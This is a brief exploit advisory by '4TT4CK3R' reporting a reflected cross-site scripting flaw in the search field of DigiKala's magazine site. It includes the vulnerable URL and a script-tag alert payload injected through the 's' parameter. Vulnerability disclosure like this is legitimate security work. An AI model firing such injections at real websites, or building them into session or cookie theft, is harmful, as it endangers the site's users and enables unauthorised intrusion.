DigiKala of Iran suffers from a cross site scripting vulnerability.
3e2fdc0e340c1adf417272d57c6719fc9cae9d1d655feb4937f4283600bd5fb7
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title : DigiKala Of Iran XSS Vulnerability
[+]
[+] Exploit Author : 4TT4CK3R
[+]
[+] Tested on : Firefox , Windows
[+]
[+] Discovered by : 4TT4CK3R
[+]
[+] Category : WebApp
[+]
[+] HomePage : https://digikala.com
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] About DigiKala :
[+] DigiKala biggest store of the Iran, now on the eve of the tenth year,
[+] with a range of diverse products for all walks of life and all ages !!
[+] Now this website have an XSS Vulnerability that patching soon !!
[+]
[+]
[+] Vulnerable address :
[+] https://mag.digikala.com/?s=
[+]
[+] When we search a product that we can use this template ..
[+] For example I would like to see 4TT4CK3R search :
[+] https://mag.digikala.com/?s=4TT4CK3R
[+]
[+] Now we cab using pur script for vulnerability testting :
[+] http://mag.digikala.com/?s=<script>alert('4TT4CK3R')</script>
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploited by : 4TT4CK3R
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]